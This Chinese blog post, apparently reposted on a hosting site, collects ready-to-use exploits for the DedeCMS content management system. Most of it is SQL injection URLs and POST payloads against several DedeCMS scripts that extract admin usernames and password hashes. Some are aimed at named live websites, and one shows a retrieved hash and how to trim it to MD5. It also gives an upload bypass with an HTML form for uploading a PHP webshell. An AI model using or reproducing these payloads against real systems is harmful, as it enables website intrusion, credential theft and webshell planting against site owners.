溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點(diǎn)擊 登錄注冊 即表示同意《億速云用戶服務(wù)條款》

DedeCMS多個漏洞exp匯總,以備后用

發(fā)布時間:2020-07-24 21:23:08 來源:網(wǎng)絡(luò) 閱讀:17744 作者:KBK影院 欄目:安全技術(shù)

爆路徑:data/mysql_error_trace.inc


一、dedecms plus/search.php注入漏洞修復(fù)及利用

0×1:

http://www.nxadmin.com/plus/search.php?keyword=as&typeArr[ uNion ]=a

報錯如果為:Safe Alert: Request Error step 2 !
則利用以下exp:

http://www.nxadmin.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a

0×2:

http://www.nxadmin.com/plus/search.php?keyword=as&typeArr[ uNion ]=a

報錯如果為:Safe Alert: Request Error step 1 !
則利用以下exp:

http://www.nxadmin.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a


二、DedeCms recommend.php注入

 exp:

http://0day5.com/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\\%27%20or%20mid=@`\\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`\\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294


三、flink.php注入

0x1:首先通過flink_add.php查看驗(yàn)證碼

0x2:利用火狐的hackbar發(fā)送post數(shù)據(jù)包

    exp:

查版本:

Submit=%20%E6%8F%90%20%E4%BA%A4%20&dopost=save&email=&logo=,if(@`'`,0x7c,(select version())),1,1,1,1,1)#,@`'`&typeid=1&url=http%3A%2F%2F&validate=驗(yàn)證碼&_FILES[webname][name]=1.gif&_FILES[webname][type]=p_w_picpath/gifx&_FILES[webname][size]=10&&_FILES[webname][tmp_name]=pass\

查密碼:

Submit=%20%E6%8F%90%20%E4%BA%A4%20&dopost=save&email=&logo=,if(@`'`,0x7c,(select concat(userid,0x7c,pwd) from dede_admin limit 0,1)),1,1,1,1,1)#,@`'`&typeid=1&url=http%3A%2F%2F&validate=驗(yàn)證碼&_FILES[webname][name]=1.gif&_FILES[webname][type]=p_w_picpath/gifx&_FILES[webname][size]=10&&_FILES[webname][tmp_name]=pass\

DedeCMS多個漏洞exp匯總,以備后用


詳情請見

http://www.wooyun.org/bugs/wooyun-2014-051950


四、ajax_membergroup.php注入漏洞


①注入漏洞。
這站 http://www.30tianlong.com/
首先訪問“/data/admin/ver.txt”頁面獲取系統(tǒng)最后升級時間,
然后訪問“/member/ajax_membergroup.php?action=post&membergroup=1”頁面,如圖說明存在該漏洞。
然后寫上語句
查看管理員帳號

http://www.30tianlong.com//member/ajax_membergroup.php?action=post&membergroup=@`'`%20Union%20select%20userid%20from%20`%23@__admin`%20where%201%20or%20id=@`'`


admin

查看管理員密碼

http://www.30tianlong.com//member/ajax_membergroup.php?action=post&membergroup=@`'`%20Union%20select%20pwd%20from%20`%23@__admin`%20where%201%20or%20id=@


8d29b1ef9f8c5a5af429

查看管理員密碼

得到的是19位的,去掉前三位和最后一位,得到管理員的16位MD5

8d2
9b1ef9f8c5a5af42
9

cmd5沒解出來 只好測試第二個方法

②上傳漏洞:

只要登陸會員中心,然后訪問頁面鏈接

http://www.xxxx.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[/code]=../dialog/select_soft_post


如圖,說明通過“/plus/carbuyaction.php”已經(jīng)成功調(diào)用了上傳頁面“/dialog/select_soft_post”

于是將Php一句話***擴(kuò)展名改為“rar”等,利用提交頁面upload1.htm

<form action="http://www.xxxx.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs1=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1">
file:<input name="uploadfile" type="file" /><br>
newname:<input name="newname" type="text" value="simple.Php"/>
<button class="button2" type="submit">提交</button><br><br>

即可上傳成功

轉(zhuǎn)載文章請注明,轉(zhuǎn)載自:小馬's Blog http://www.i0day.com


向AI問一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進(jìn)行舉報,并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI